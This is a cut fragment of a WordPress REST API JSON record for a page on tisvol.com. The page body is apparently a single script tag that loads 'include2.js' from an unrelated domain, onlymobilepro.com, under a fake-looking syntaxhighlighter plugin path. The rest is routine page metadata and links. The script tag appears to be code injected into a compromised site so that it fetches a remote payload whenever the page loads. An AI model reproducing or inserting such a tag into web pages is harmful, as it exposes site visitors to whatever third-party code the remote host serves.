class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-15040'><div class='entry-content-wrapper clearfix'><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":15255,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-15040","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/pages\/15040","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/comments?post=15040"}],"version-history":[{"count":0,"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/pages\/15040\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/pages\/15255"}],"wp:attachment":[{"href":"https:\/\/tisvol.com\/hu\/wp-json\/wp\/v2\/media?parent=15040"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}